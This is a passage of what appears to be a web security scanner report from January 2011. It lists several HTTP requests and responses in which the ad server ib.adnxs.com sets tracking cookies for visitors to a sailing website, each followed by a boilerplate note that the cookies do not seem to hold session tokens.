GET /ptj?member=311&inv_code=cm.martini&size=160x600&referrer=http%3A%2F%2Fwww.sailinganarchy.com%2Findex_page1.php&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.martini%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-23797598_1295482817%2C11d765b6a10b1b3%2Csports%2Ccm.cm_aa_gn1-cm.weath_l-cm.sports_l%3B%3Bcmw%3Dowl%3Bsz%3D160x600%3Bnet%3Dcm%3Bord1%3D881330%3Bcontx%3Dsports%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.sports_l%3Bord%3D3751955344%3F HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.sailinganarchy.com/index_page1.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sess=1; icu=EAAYAA..; acb113196=5_[r^kI/7ZrO@Pn0nf8MvlYT!?enc=usDlsWbk4j8Ox07TwgDhPwAAAAAAAAhADsdO08IA4T-6wOWxZuTiP8LS2pGwuOcdBWHfHSmrEEK_fzdNAAAAAGI7AwA3AQAAZAAAAAIAAAA4UAIAPV0AAAEAAABVU0QAVVNEANgCWgCqAQAA4AUBAgUCAAUAAAAAsiOTEgAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482815%29%3Buf%28%27r%27%2C+151608%2C+1295482815%29%3Bppv%2882%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2884%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2811%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2882%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2884%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2887%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28619%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28620%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28621%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3B&cnd=!LR4gugjUEBC4oAkYwI8BIL26ASgAMVSzvcxm5OI_QhMIABAAGAAgASj-__________8BQg0IUhC-40sYpQggAygGQg0IVBDVlhsYgQQgAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhcvjr/?0P(*AuB-u**g1:XIEPGUMbNTs4#%DBZoIf(PCR0ep_TvkXX49-qCQB:hlS?9mnBp47]h3?C^q0Wv5MQ*ZwB-!3PYw5C215#'1yq9A1-rNS-!<d=acxcxImXfqnsb.XDvw(L75^wACGY+1'U74=YF]nOpI=48$^Tx()%_!wzkF2Ple$
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Fri, 21-Jan-2011 00:30:09 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:30:09 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb113196=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=EAAYAA..; path=/; expires=Wed, 20-Apr-2011 00:30:09 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb614429=5_[r^XI()vrO@Pn0nf8M=sK?z?enc=pyOAm8UL4j-wuVlyyz3gPwAAAAAAAAhAsLlZcss94D-nI4CbxQviP014-CWPh5xaBWHfHSmrEEIRgjdNAAAAAGI7AwA3AQAAZAAAAAIAAAA5UAIAPV0AAAEAAABVU0QAVVNEAKAAWAKqAQAAnAgBAgUCAAUAAAAAzB7BYQAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295483409%29%3Buf%28%27r%27%2C+151609%2C+1295483409%29%3Bppv%2882%2C+%276529242608667490381%27%2C+1295483409%2C+1305851409%2C+2132%2C+23869%29%3Bppv%2884%2C+%276529242608667490381%27%2C+1295483409%2C+1305851409%2C+2132%2C+23869%29%3Bppv%2811%2C+%276529242608667490381%27%2C+1295483409%2C+1305851409%2C+2132%2C+23869%29%3Bppv%2882%2C+%276529242608667490381%27%2C+1295483409%2C+1305851409%2C+2132%2C+23869%29%3Bppv%2884%2C+%276529242608667490381%27%2C+1295483409%2C+1305851409%2C+2132%2C+23869%29%3Bppv%2887%2C+%276529242608667490381%27%2C+1295483409%2C+1295569809%2C+2132%2C+23869%29%3Bppv%28619%2C+%276529242608667490381%27%2C+1295483409%2C+1295569809%2C+2132%2C+23869%29%3Bppv%28620%2C+%276529242608667490381%27%2C+1295483409%2C+1295569809%2C+2132%2C+23869%29%3Bppv%28621%2C+%276529242608667490381%27%2C+1295483409%2C+1295569809%2C+2132%2C+23869%29%3B&cnd=!MR7WtAjUEBC5oAkYwI8BIL26ASgAMbKd76fGC-I_QhMIABAAGAAgASj-__________8BQg0IUhC54i4YoxkgAygGQg0IVBC5yTMYhwogAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Fri, 21-Jan-2011 00:30:09 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:30:09 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG7*@E:3F.0s]#%2L_'x%SEV/hnK7#=G#<huqu*`^-sAq$WUeUDuqkMr+c^Z(+ql_Y`mC^.fk]u+-ptW1B'#)hgVCgQw>7'NF7uNVkG0XN^BPJ.^ZXwcsDU[n.KmyD0IP?EJtun(LG%y$qg]mwnXkD%zsU*oU'LW('INuCClbQ^7w=g32M!L$Ue*y[MoYC89[aS; path=/; expires=Wed, 20-Apr-2011 00:30:09 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Thu, 20 Jan 2011 00:30:09 GMT Content-Length: 440
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ptj?member=311&inv_code=cm.martini&size=160x600&referrer=http%3A%2F%2Fwww.sailinganarchy.com%2Findex_page1.php&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.martini%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-93054228_1295482822%2C11d765b6a10b1b3%2Csports%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sports_l-cm.weath_l%3B%3Bcmw%3Dowl%3Bsz%3D160x600%3Bnet%3Dcm%3Bord1%3D405617%3Bcontx%3Dsports%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sports_l%3Bbtg%3Dcm.weath_l%3Bord%3D423951444%3F HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.sailinganarchy.com/index_page1.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: acb113196=5_[r^kI/7ZrO@Pn0nf8MvlYT!?enc=usDlsWbk4j8Ox07TwgDhPwAAAAAAAAhADsdO08IA4T-6wOWxZuTiP8LS2pGwuOcdBWHfHSmrEEK_fzdNAAAAAGI7AwA3AQAAZAAAAAIAAAA4UAIAPV0AAAEAAABVU0QAVVNEANgCWgCqAQAA4AUBAgUCAAUAAAAAsiOTEgAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482815%29%3Buf%28%27r%27%2C+151608%2C+1295482815%29%3Bppv%2882%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2884%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2811%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2882%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2884%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2887%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28619%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28620%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28621%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3B&cnd=!LR4gugjUEBC4oAkYwI8BIL26ASgAMVSzvcxm5OI_QhMIABAAGAAgASj-__________8BQg0IUhC-40sYpQggAygGQg0IVBDVlhsYgQQgAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; sess=1; icu=EAAYAA..; acb303093=5_[r^XI()vrO@Pn0nf8MwM9g$?enc=pyOAm8UL4j-wuVlyyz3gPwAAAAAAAAhAsLlZcss94D-nI4CbxQviP9CL-hxz-rYyBWHfHSmrEELBfzdNAAAAAGI7AwA3AQAAZAAAAAIAAAA5UAIAPV0AAAEAAABVU0QAVVNEAKAAWAKqAQAAeggBAgUCAAUAAAAALyC12AAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482817%29%3Buf%28%27r%27%2C+151609%2C+1295482817%29%3Bppv%2882%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2884%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2811%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2882%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2884%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2887%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3Bppv%28619%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3Bppv%28620%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3Bppv%28621%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3B&cnd=!MR7WtAjUEBC5oAkYwI8BIL26ASgAMbKd76fGC-I_QhMIABAAGAAgASj-__________8BQg0IUhC54i4YoxkgAygGQg0IVBC5yTMYhwogAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7*@E:3F.0s]#%2L_'x%SEV/hnK7#=G#<huqu*`^-sAq$WUeUDuqkMr+c^Z(+ql_Y`mC^.fk]u+-ptW1B'#)hgVCgQw>7'NF7uNVkG0XN^BPJ.^ZXwcsDU[n.KmyD0IP?EJtun(LG%y$qg]mwnXkD%rDs0:0$Ob('INuCClbQ^7w=g32LzAgGCPGs/^Zf3+TaP
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Fri, 21-Jan-2011 00:20:22 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:20:22 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=EAAYAA..; path=/; expires=Wed, 20-Apr-2011 00:20:22 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb778475=5_[r^XI()vrO@Pn0nf8M!j@7*?enc=pyOAm8UL4j-wuVlyyz3gPwAAAAAAAAhAsLlZcss94D-nI4CbxQviPzkMt5lmDXglBWHfHSmrEELGfzdNAAAAAGI7AwA3AQAAZAAAAAIAAAA5UAIAPV0AAAEAAABVU0QAVVNEAKAAWAKqAQAA_gYBAgUCAAUAAAAAlR4hLwAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482822%29%3Buf%28%27r%27%2C+151609%2C+1295482822%29%3Bppv%2882%2C+%272699922710925347897%27%2C+1295482822%2C+1305850822%2C+2132%2C+23869%29%3Bppv%2884%2C+%272699922710925347897%27%2C+1295482822%2C+1305850822%2C+2132%2C+23869%29%3Bppv%2811%2C+%272699922710925347897%27%2C+1295482822%2C+1305850822%2C+2132%2C+23869%29%3Bppv%2882%2C+%272699922710925347897%27%2C+1295482822%2C+1305850822%2C+2132%2C+23869%29%3Bppv%2884%2C+%272699922710925347897%27%2C+1295482822%2C+1305850822%2C+2132%2C+23869%29%3Bppv%2887%2C+%272699922710925347897%27%2C+1295482822%2C+1295569222%2C+2132%2C+23869%29%3Bppv%28619%2C+%272699922710925347897%27%2C+1295482822%2C+1295569222%2C+2132%2C+23869%29%3Bppv%28620%2C+%272699922710925347897%27%2C+1295482822%2C+1295569222%2C+2132%2C+23869%29%3Bppv%28621%2C+%272699922710925347897%27%2C+1295482822%2C+1295569222%2C+2132%2C+23869%29%3B&cnd=!MR7WtAjUEBC5oAkYwI8BIL26ASgAMbKd76fGC-I_QhMIABAAGAAgASj-__________8BQg0IUhC54i4YoxkgAygGQg0IVBC5yTMYhwogAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Fri, 21-Jan-2011 00:20:22 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:20:22 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG49EE:3F.0s]#%2L_'x%SEV/hnLCF=G#<huqu*`^-sAq$WUeUDuqkMr+c^Z(+ql_Y`mC^.fk]u+-ptW1B'#)'qHqWd-AGmScENVx-p:Y9b66ZCJLN[8yvY$hcwDwhp^RbpUUZcwln=gw`]wKC0A)'9Dj6XfCjr1a#[D:I(3<csJ3xssMdQ3gcc=Zx1u*B$99h/3z-gm; path=/; expires=Wed, 20-Apr-2011 00:20:22 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Thu, 20 Jan 2011 00:20:22 GMT Content-Length: 504
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ptj?member=311&inv_code=cm.martini&size=728x90&referrer=http%3A%2F%2Fwww.sailinganarchy.com%2Findex_page1.php&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.martini%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-82053649_1295482372%2C11d765b6a10b1b3%2Csports%2Ccm.cm_aa_gn1-cm.weath_l%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Bord1%3D707118%3Bcontx%3Dsports%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.weath_l%3Bord%3D3271752524%3F HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.sailinganarchy.com/index_page1.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=EAAYAA..; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG10Qcvjr/?0P(*AuB-u**g1:XICjmUMbNTn>qsXgZ2Ox#Kzwi3jhndu4.q@P`fym?BM6A(6j?L^F^pT+$t)o#'1yqNmTr+csDU[n.KmyD0IP?EJtun(LG%y$qg]mw!5$=%sod-+0?6As/^Y`/=Uxi
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Fri, 21-Jan-2011 00:29:54 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:29:54 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=EAAYAA..; path=/; expires=Wed, 20-Apr-2011 00:29:54 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb261605=5_[r^kI/7ZrO@Pn0nf8M8*^ck?enc=usDlsWbk4j8Ox07TwgDhPwAAAAAAAAhADsdO08IA4T-6wOWxZuTiPyPsVQiJOiRCBWHfHSmrEEICgjdNAAAAAGI7AwA3AQAAZAAAAAIAAAA4UAIAPV0AAAEAAABVU0QAVVNEANgCWgCqAQAAGwkBAgUCAAUAAAAAYR-m3gAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295483394%29%3Buf%28%27r%27%2C+151608%2C+1295483394%29%3Bppv%2882%2C+%274765998665889606691%27%2C+1295483394%2C+1305851394%2C+2132%2C+23869%29%3Bppv%2884%2C+%274765998665889606691%27%2C+1295483394%2C+1305851394%2C+2132%2C+23869%29%3Bppv%2811%2C+%274765998665889606691%27%2C+1295483394%2C+1305851394%2C+2132%2C+23869%29%3Bppv%2882%2C+%274765998665889606691%27%2C+1295483394%2C+1305851394%2C+2132%2C+23869%29%3Bppv%2884%2C+%274765998665889606691%27%2C+1295483394%2C+1305851394%2C+2132%2C+23869%29%3Bppv%2887%2C+%274765998665889606691%27%2C+1295483394%2C+1295569794%2C+2132%2C+23869%29%3Bppv%28619%2C+%274765998665889606691%27%2C+1295483394%2C+1295569794%2C+2132%2C+23869%29%3Bppv%28620%2C+%274765998665889606691%27%2C+1295483394%2C+1295569794%2C+2132%2C+23869%29%3Bppv%28621%2C+%274765998665889606691%27%2C+1295483394%2C+1295569794%2C+2132%2C+23869%29%3B&cnd=!LR4gugjUEBC4oAkYwI8BIL26ASgAMVSzvcxm5OI_QhMIABAAGAAgASj-__________8BQg0IUhC-40sYpQggAygGQg0IVBDVlhsYgQQgAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Fri, 21-Jan-2011 00:29:54 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:29:54 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG10Qcvjr/?0P(*AuB-u**g1:XICjmUMbNTPg<>4lhRUC(PCR0ep_TvkXX49-qCQB:hlS?9mnBpbb)jKuoIgTwzHPZ2[uGVGi2$WVP]vE7ilpu2(MPy%SF(w77BERA(EO4I(3<csJ3xssMeZG!9KUs%nl<0; path=/; expires=Wed, 20-Apr-2011 00:29:54 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Thu, 20 Jan 2011 00:29:54 GMT Content-Length: 402
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ptj?member=311&inv_code=cm.martini&size=728x90&referrer=http%3A%2F%2Fwww.sailinganarchy.com%2Findex_page1.php&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.martini%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-69155988_1295482815%2C11d765b6a10b1b3%2Csports%2Ccm.cm_aa_gn1-cm.sports_l-cm.weath_l%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Bord1%3D777061%3Bcontx%3Dsports%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sports_l%3Bbtg%3Dcm.weath_l%3Bord%3D1768089178%3F HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.sailinganarchy.com/index_page1.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=EAAYAA..; acb35548=5_[r^kI/7ZrO@Pn0nf8M8cp]i?enc=usDlsWbk4j8Ox07TwgDhPwAAAAAAAAhADsdO08IA4T-6wOWxZuTiP1729trACfBsBWHfHSmrEEIEfjdNAAAAAGI7AwA3AQAAZAAAAAIAAAA4UAIAPV0AAAEAAABVU0QAVVNEANgCWgCqAQAA6AgBAgUCAAUAAAAA3yJj0gAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482372%29%3Buf%28%27r%27%2C+151608%2C+1295482372%29%3Bppv%2882%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2884%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2811%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2882%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2884%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2887%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3Bppv%28619%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3Bppv%28620%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3Bppv%28621%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3B&cnd=!LR4gugjUEBC4oAkYwI8BIL26ASgAMVSzvcxm5OI_QhMIABAAGAAgASj-__________8BQg0IUhC-40sYpQggAygGQg0IVBDVlhsYgQQgAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG3H<cvjr/?0P(*AuB-u**g1:XIC8]UMbNTs4#%DBZoIf(PCR0ep_TvkXX49-qCQB:hlS?9mnBp47]h3?C^q0Wv5MQ*ZwB-!3PYw5C215#'1yq9A1-rNS-!<d=acxcxImXfqnsb.XDvw(L75^wACGY+1'U74=YF]n@)*InD4_+
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Fri, 21-Jan-2011 00:20:15 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:20:15 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb35548=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=EAAYAA..; path=/; expires=Wed, 20-Apr-2011 00:20:15 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb113196=5_[r^kI/7ZrO@Pn0nf8MvlYT!?enc=usDlsWbk4j8Ox07TwgDhPwAAAAAAAAhADsdO08IA4T-6wOWxZuTiP8LS2pGwuOcdBWHfHSmrEEK_fzdNAAAAAGI7AwA3AQAAZAAAAAIAAAA4UAIAPV0AAAEAAABVU0QAVVNEANgCWgCqAQAA4AUBAgUCAAUAAAAAsiOTEgAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482815%29%3Buf%28%27r%27%2C+151608%2C+1295482815%29%3Bppv%2882%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2884%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2811%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2882%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2884%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2887%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28619%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28620%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28621%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3B&cnd=!LR4gugjUEBC4oAkYwI8BIL26ASgAMVSzvcxm5OI_QhMIABAAGAAgASj-__________8BQg0IUhC-40sYpQggAygGQg0IVBDVlhsYgQQgAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Fri, 21-Jan-2011 00:20:15 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:20:15 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG7vhcvjr/?0P(*AuB-u**g1:XIEPGUMbNTs4#%DBZoIf(PCR0ep_TvkXX49-qCQB:hlS?9mnBp47]h3?C^q0Wv5MQ*ZwB-!3PYw5C215#'1yq9A1-rNS-!<d=acxcxImXfqnsb.XDvw(L75^wACGY+1'U74=YF]nOpI=48$^Tx()%_!wzkF2Ple$; path=/; expires=Wed, 20-Apr-2011 00:20:15 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Thu, 20 Jan 2011 00:20:15 GMT Content-Length: 517
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ptj?member=311&inv_code=cm.martini&size=160x600&referrer=http%3A%2F%2Fwww.sailinganarchy.com%2Findex_page1.php&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.martini%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-93054228_1295482822%2C11d765b6a10b1b3%2Csports%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sports_l-cm.weath_l%3B%3Bcmw%3Dowl%3Bsz%3D160x600%3Bnet%3Dcm%3Bord1%3D405617%3Bcontx%3Dsports%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sports_l%3Bbtg%3Dcm.weath_l%3Bord%3D423951444%3F HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.sailinganarchy.com/index_page1.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: acb113196=5_[r^kI/7ZrO@Pn0nf8MvlYT!?enc=usDlsWbk4j8Ox07TwgDhPwAAAAAAAAhADsdO08IA4T-6wOWxZuTiP8LS2pGwuOcdBWHfHSmrEEK_fzdNAAAAAGI7AwA3AQAAZAAAAAIAAAA4UAIAPV0AAAEAAABVU0QAVVNEANgCWgCqAQAA4AUBAgUCAAUAAAAAsiOTEgAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482815%29%3Buf%28%27r%27%2C+151608%2C+1295482815%29%3Bppv%2882%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2884%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2811%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2882%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2884%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2887%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869